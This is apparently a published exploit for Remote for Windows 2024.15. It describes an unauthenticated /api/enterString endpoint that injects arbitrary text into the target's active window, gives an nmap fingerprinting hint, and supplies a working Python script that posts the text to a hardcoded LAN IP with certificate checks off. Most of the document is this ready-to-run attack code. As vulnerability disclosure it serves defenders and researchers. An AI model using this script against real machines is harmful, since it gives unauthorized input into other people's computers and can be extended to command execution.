# Exploit Title: Remote for Windows 2024.15 - Unauthenticated Arbitrary Input into Active Window
# Date: 2025-05-23
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://rs.ltd
# Software Link: https://rs.ltd/latest.php?os=win
# Version: 2024.15
# Tested on: Windows 10/11 with Remote for Windows (helper)

'''
Description:
- The enterString API endpoint allows unauthenticated attackers to inject raw text
  into the target's active window without requiring keystroke simulation or special keycodes.
- Works when the "Allow unknown devices" setting is enabled (default: disabled)

Vulnerable Component:
- The /api/enterString endpoint with missing authentication checks

# Identification:
nmap -p- -T4 --script ssl-cert
Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US
'''

import requests
import urllib3

# Certificate verification is disabled below (verify=False), so silence the resulting warnings.
urllib3.disable_warnings()

TARGET_IP = "192.168.8.105"
TEXT_TO_INJECT = "This text appears verbatim on the target"

# The text is URL-encoded and appended to the endpoint path.
response = requests.post(
    f"https://{TARGET_IP}:49762/api/enterString={requests.utils.quote(TEXT_TO_INJECT)}",
    # Placeholder header values; no valid client token is supplied.
    headers={
        "X-ClientToken": "unchecked",
        "X-HostName": "any",
        "X-HostFullModel": "any"
    },
    verify=False
)

print(f"Status: {response.status_code}")